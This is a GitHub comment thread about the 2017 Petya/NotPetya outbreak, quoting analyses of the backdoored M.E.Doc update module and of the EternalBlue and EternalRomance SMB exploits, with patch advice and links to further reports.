The backdoored module has the filename ZvitPublishedObjects.dll. This was written using the .NET Framework. It is a 5MB file and contains a lot of legitimate code that can be called by other components, including the main M.E.Doc executable ezvit.exe.

We examined all M.E.Doc updates that were released during 2017, and found that there are at least three updates that contained the backdoored module:
01.175-10.01.176, released on 14th of April 2017
01.180-10.01.181, released on 15th of May 2017
01.188-10.01.189, released on 22nd of June 2017

and

Warning! We recommend changing passwords for proxies, and for email accounts for all users of M.E.Doc software.

eua1024 commented Jul 5, 2017 edited

Please, change information

The new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability CVE-2017-0144 (also known as EternalBlue), which was fixed in security update MS17-010 and was also exploited by WannaCrypt to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for CVE-2017-0145 (also known as EternalRomance, and fixed by the same bulletin)

Machines that are patched against these exploits (with security update MS17-010 https://technet.microsoft.com/en-us/library/security/ms17-010.aspx) or have disabled SMBv1 (https://support.microsoft.com/kb/2696547) are not affected by this particular spreading mechanism

from block https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759#vulnerabilitiesvectorsactions
to plain-format or insert it into the quote. Code-format for this information is not readable.

eua1024 commented Jul 5, 2017 edited

Please, add link In ExPetr/Petya’s shadow, FakeCry ransomware wave hits Ukraine https://securelist.com/in-expetrpetyas-shadow-fakecry-ransomware-wave-hits-ukraine/78973/

eua1024 commented Jul 5, 2017 edited

Russian language version of post «Analysis of TeleBots’ cunning backdoor» (https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/) https://geektimes.ru/post/290779

ransomware prevent open source code based on freebsd os adding my firewall if anyone knows that link pls send me
my mail id karikalan4692@gmail.com

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment